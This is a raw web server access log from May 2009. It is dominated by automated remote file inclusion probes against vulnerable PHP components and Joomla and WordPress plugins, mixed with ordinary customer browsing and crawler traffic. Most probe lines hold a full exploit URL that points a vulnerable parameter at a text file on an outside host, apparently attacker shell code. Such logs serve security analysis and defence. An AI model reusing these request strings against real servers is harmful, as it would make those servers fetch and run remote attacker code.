85.18.117.101 - - [13/May/2009:06:25:58 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:25:58 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:25:58 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:06:25:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:25:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:25:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
85.18.117.101 - - [13/May/2009:06:26:08 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:26:10 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:26:10 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:26:10 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:06:26:10 -0400] "GET /logs/access_log.Q108081200%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:26:14 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:26:14 -0400] "GET /logs/access_log.Q108081200%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.15.48.60 - - [13/May/2009:06:26:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
67.15.48.60 - - [13/May/2009:06:26:26 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 229 "-" "libwww-perl/5.810"
67.15.48.60 - - [13/May/2009:06:26:27 -0400] "GET /logs/access_log.Q108062600//include/admin.lib.inc.php?site_path=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 251 "-" "libwww-perl/5.810"
218.185.20.88 - - [13/May/2009:06:26:27 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.15.48.60 - - [13/May/2009:06:26:27 -0400] "GET /logs/access_log.Q108051700//include/admin.lib.inc.php?site_path=http://cms.halberstadtwerke.de/tip/ligen/.../ids??? HTTP/1.1" 404 251 "-" "libwww-perl/5.810"
218.185.20.88 - - [13/May/2009:06:26:33 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:06:27:03 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:27:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:27:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
85.18.117.101 - - [13/May/2009:06:27:14 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:27:15 -0400] "GET /logs/access_log.Q108081200%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.240.12.4 - - [13/May/2009:06:27:31 -0400] "GET /logs//include/write.php?dir=http://www.koreavan.kr/bbs/id2x.txt?%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
210.240.12.4 - - [13/May/2009:06:27:31 -0400] "GET //include/write.php?dir=http://www.koreavan.kr/bbs/id2x.txt?%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
210.240.12.4 - - [13/May/2009:06:27:31 -0400] "GET /logs/error_log.Q109051100//include/write.php?dir=http://www.koreavan.kr/bbs/id2x.txt?%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
200.32.100.130 - - [13/May/2009:06:28:03 -0400] "GET /logs/senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:28:03 -0400] "GET /logs/access_log.Q108061400/senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:28:03 -0400] "GET /senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:28:08 -0400] "GET /senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:28:08 -0400] "GET /logs/senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:28:08 -0400] "GET /logs/access_log.Q108061400/senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:28:18 -0400] "GET /senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:28:18 -0400] "GET /logs/access_log.Q108061400/senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:06:28:54 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:06:28:54 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:06:30:12 -0400] "GET /logs/error_log.Q107102900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.117.191.71 - - [13/May/2009:06:30:24 -0400] "GET /logs/error_log.Q108082500//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:06:30:24 -0400] "GET //trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:06:30:24 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.65"
88.191.103.144 - - [13/May/2009:06:30:25 -0400] "GET /logs/error_log.Q108082500//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.825"
67.204.0.222 - - [13/May/2009:06:30:25 -0400] "GET /logs/error_log.Q108082500//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
88.191.103.144 - - [13/May/2009:06:30:25 -0400] "GET //trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.825"
67.204.0.222 - - [13/May/2009:06:30:25 -0400] "GET //trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
88.191.103.144 - - [13/May/2009:06:30:25 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.825"
67.204.0.222 - - [13/May/2009:06:30:25 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
87.106.135.14 - - [13/May/2009:06:30:25 -0400] "GET /logs/error_log.Q108082500//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:06:30:26 -0400] "GET //trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:06:30:26 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
88.191.103.144 - - [13/May/2009:06:30:30 -0400] "GET /logs/access_log.Q108082500//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.825"
216.117.191.71 - - [13/May/2009:06:30:31 -0400] "GET /logs/access_log.Q108082500//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
67.204.0.222 - - [13/May/2009:06:30:34 -0400] "GET /logs/access_log.Q108082500//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
87.106.135.14 - - [13/May/2009:06:30:39 -0400] "GET /logs/access_log.Q108082500//trans/trans.php?trans=&page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
208.64.202.135 - - [13/May/2009:06:31:45 -0400] "GET /index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:31:45 -0400] "GET /logs/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:31:45 -0400] "GET /logs/access_log.Q108112700%20%20/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:31:47 -0400] "GET /index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:31:47 -0400] "GET /logs/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:31:47 -0400] "GET /logs/access_log.Q108112700%20%20/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.49.23.119 - - [13/May/2009:06:32:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
83.49.23.119 - - [13/May/2009:06:32:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
83.49.23.119 - - [13/May/2009:06:32:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
200.32.100.130 - - [13/May/2009:06:32:06 -0400] "GET /logs/access_log.Q109050700/senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.49.23.119 - - [13/May/2009:06:32:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
83.49.23.119 - - [13/May/2009:06:32:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
84.201.208.50 - - [13/May/2009:06:32:21 -0400] "GET /logs/access_log.Q109050900//components/com_smf/smf.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:33:17 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:33:17 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:33:17 -0400] "GET /logs/access_log.Q109022600//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:06:33:23 -0400] "GET /logs/error_log.Q107120400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.49.23.119 - - [13/May/2009:06:33:01 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
200.32.100.130 - - [13/May/2009:06:33:30 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:33:30 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:33:30 -0400] "GET /logs/access_log.Q109022600//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
24.227.40.189 - - [13/May/2009:06:33:40 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:33:47 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:33:47 -0400] "GET /logs/access_log.Q109022600%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:33:47 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:33:52 -0400] "GET /logs/access_log.Q108110400%20%20/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.64.202.135 - - [13/May/2009:06:33:54 -0400] "GET /logs/access_log.Q108110400%20%20/index2.php?ID=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.207.110.102 - - [13/May/2009:06:34:02 -0400] "GET ////////s_loadenv.inc.php?DOCUMENT_ROOT=http://www.agrippine.net/components/com/image?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
200.32.100.130 - - [13/May/2009:06:34:03 -0400] "GET /logs/access_log.Q109022200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
217.160.4.250 - - [13/May/2009:06:34:24 -0400] "GET /admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
217.160.4.250 - - [13/May/2009:06:34:25 -0400] "GET /logs/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
217.160.4.250 - - [13/May/2009:06:34:25 -0400] "GET /logs/access_log.Q108101100/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
163.24.136.10 - - [13/May/2009:06:34:37 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
163.24.136.10 - - [13/May/2009:06:34:37 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
83.49.23.119 - - [13/May/2009:06:34:47 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
83.49.23.119 - - [13/May/2009:06:34:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
87.106.135.14 - - [13/May/2009:06:34:47 -0400] "GET /logs/access_log.Q108090400//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:06:34:48 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:06:34:48 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
83.49.23.119 - - [13/May/2009:06:34:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
83.49.23.119 - - [13/May/2009:06:34:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
121.165.73.157 - - [13/May/2009:06:34:53 -0400] "GET /logs/error_log.Q109050600/errors.php?error=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:34:53 -0400] "GET /errors.php?error=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:34:53 -0400] "GET /logs/errors.php?error=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:06:34:55 -0400] "GET /logs/access_log.Q108103000/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:06:34:57 -0400] "GET /logs/error_log.Q108022800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.165.73.157 - - [13/May/2009:06:35:12 -0400] "GET /logs/error_log.Q109050600/errors.php?error=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:35:12 -0400] "GET /errors.php?error=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
163.24.136.10 - - [13/May/2009:06:35:12 -0400] "GET /logs/access_log.Q108083100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
121.165.73.157 - - [13/May/2009:06:35:12 -0400] "GET /logs/errors.php?error=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
72.30.79.49 - - [13/May/2009:06:37:25 -0400] "GET /logs/access_log.Q109010200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.207.110.102 - - [13/May/2009:06:37:35 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.agrippine.net/components/com/image?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
200.32.100.130 - - [13/May/2009:06:37:56 -0400] "GET /logs/access_log.Q109050700/senetman/html/index.php?page=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.165.73.157 - - [13/May/2009:06:37:57 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:37:57 -0400] "GET //galeria.php?start=0&kategoria=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:37:57 -0400] "GET /logs/access_log.Q108120600//galeria.php?start=0&kategoria=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:37:57 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:38:00 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:38:00 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:38:00 -0400] "GET //galeria.php?start=0&kategoria=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:38:00 -0400] "GET /logs/access_log.Q108120600//galeria.php?start=0&kategoria=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
81.175.71.121 - - [13/May/2009:06:38:30 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
81.175.71.121 - - [13/May/2009:06:38:30 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1156 "-" "Mozilla/5.0"
81.175.71.121 - - [13/May/2009:06:38:30 -0400] "GET /logs/access_log.Q108062800///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.181.203.24 - - [13/May/2009:06:38:42 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
81.181.203.24 - - [13/May/2009:06:38:42 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
81.175.71.121 - - [13/May/2009:06:38:50 -0400] "GET /logs/access_log.Q108072700///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:06:38:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:38:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:38:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.227.156.113 - - [13/May/2009:06:39:00 -0400] "GET /logs/error_log.Q109051100//include/write.php?dir=http://tsceskina.com/images/12.TXT? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
